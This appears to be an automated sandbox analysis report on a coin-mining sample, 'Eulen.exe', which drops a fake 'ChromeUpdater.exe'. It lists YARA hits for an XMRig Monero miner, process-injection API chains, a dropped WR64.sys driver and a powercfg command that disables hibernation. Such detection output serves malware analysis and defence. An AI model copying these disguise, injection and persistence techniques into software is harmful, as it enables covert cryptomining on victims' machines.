Source: Yara match	File source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPED

Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe

Directory created: C:\Program Files\Google\Libs

Source: Eulen.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Diagnostics.pdb source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbx source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ~1.PDB @7_9)ux source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error3)y source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb04 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorV)y source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\symsrv.dllp.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99175BE3C FindFirstFileExW,	19_2_000002E99175BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCEBE3C FindFirstFileExW,	22_2_00000213BDCEBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709DBE3C FindFirstFileExW,	23_2_00000158709DBE3C
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15CBE3C FindFirstFileExW,	24_2_0000026DB15CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3F066BE3C FindFirstFileExW,	26_2_000002A3F066BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFBBBE3C FindFirstFileExW,	27_2_000002C9AFBBBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9B029BE3C FindFirstFileExW,	27_2_000002C9B029BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06FD4BE3C FindFirstFileExW,	28_2_000002C06FD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C3BBE3C FindFirstFileExW,	29_2_000002917C3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C97BE3C FindFirstFileExW,	29_2_000002917C97BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000002238279BE3C FindFirstFileExW,	30_2_000002238279BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000028A1B88BE3C FindFirstFileExW,	31_2_0000028A1B88BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486AD7BE3C FindFirstFileExW,	32_2_000001486AD7BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486ADDBE3C FindFirstFileExW,	32_2_000001486ADDBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CDBE3C FindFirstFileExW,	33_2_0000024BD3CDBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3D3BE3C FindFirstFileExW,	33_2_0000024BD3D3BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D6BE3C FindFirstFileExW,	34_2_000001FA73D6BE3C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E42FBE3C FindFirstFileExW,	39_2_00000249E42FBE3C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E432BE3C FindFirstFileExW,	39_2_00000249E432BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD0240BE3C FindFirstFileExW,	41_2_000001CD0240BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA66BE3C FindFirstFileExW,	42_2_00000269BA66BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA6CBE3C FindFirstFileExW,	42_2_00000269BA6CBE3C

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49711
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49708

Source: lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2696877762.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1541582166.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2699670593.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1542535250.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2697708247.00000213BD471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2694626100.00000213BD400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: powershell.exe, 0000000F.00000002.1601184621.0000015DE9224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000F.00000002.1601184621.0000015DE9224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1542535250.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2697708247.00000213BD471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2696877762.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1541582166.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2699670593.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2694626100.00000213BD400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2696877762.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1541582166.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2699670593.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000016.00000000.1538364369.00000213BCEB8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2691338350.00000213BCEB8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000016.00000000.1538914753.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2694626100.00000213BD400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2696877762.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1541582166.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1542535250.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2694626100.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2699670593.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2697708247.00000213BD471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000020.00000002.2696354530.000001486A5B0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 0000000F.00000002.1566783925.0000015D80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.1566783925.0000015D80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process information set: 01 00 00 00
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

PE file contains section with special chars

Source: Eulen.exe	Static PE information: section name: .@yC
Source: Eulen.exe	Static PE information: section name: .j]_
Source: Eulen.exe	Static PE information: section name: .+.:
Source: ChromeUpdater.exe.0.dr	Static PE information: section name: .@yC
Source: ChromeUpdater.exe.0.dr	Static PE information: section name: .j]_
Source: ChromeUpdater.exe.0.dr	Static PE information: section name: .+.:

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Windows\System32\dialer.exe	Code function: 14_2_00007FF6473410C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	14_2_00007FF6473410C0
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991752A7C NtEnumerateValueKey,NtEnumerateValueKey,	19_2_000002E991752A7C
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCE26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,	22_2_00000213BDCE26F0
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCE21CC NtQuerySystemInformation,StrCmpNIW,	22_2_00000213BDCE21CC
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15C2A7C NtEnumerateValueKey,NtEnumerateValueKey,	24_2_0000026DB15C2A7C
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_00000223827923F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	30_2_00000223827923F0
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_00000223827921CC NtQuerySystemInformation,StrCmpNIW,	30_2_00000223827921CC

Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe

File deleted: C:\Windows\Temp\auqpbnqlvfdv.tmp

Source: C:\Windows\System32\dialer.exe	Code function: 14_2_00007FF6473414E4	14_2_00007FF6473414E4
Source: C:\Windows\System32\dialer.exe	Code function: 14_2_00007FF647342328	14_2_00007FF647342328
Source: C:\Windows\System32\dialer.exe	Code function: 14_2_00007FF6473426E8	14_2_00007FF6473426E8
Source: C:\Windows\System32\dialer.exe	Code function: 14_2_00007FF647341DB4	14_2_00007FF647341DB4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4B0352F1	15_2_00007FFB4B0352F1
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99172F2F8	19_2_000002E99172F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99172B23C	19_2_000002E99172B23C
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991731658	19_2_000002E991731658
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E9917220DC	19_2_000002E9917220DC
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99172B030	19_2_000002E99172B030
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99175FEF8	19_2_000002E99175FEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99175BE3C	19_2_000002E99175BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991762258	19_2_000002E991762258
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991752CDC	19_2_000002E991752CDC
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99175BC30	19_2_000002E99175BC30
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991791658	19_2_000002E991791658
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E9917820DC	19_2_000002E9917820DC
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99178B030	19_2_000002E99178B030
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99178F2F8	19_2_000002E99178F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99178B23C	19_2_000002E99178B23C
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCB20DC	22_2_00000213BDCB20DC
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCBB030	22_2_00000213BDCBB030
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCBF2F8	22_2_00000213BDCBF2F8
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCBB23C	22_2_00000213BDCBB23C
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCC1658	22_2_00000213BDCC1658
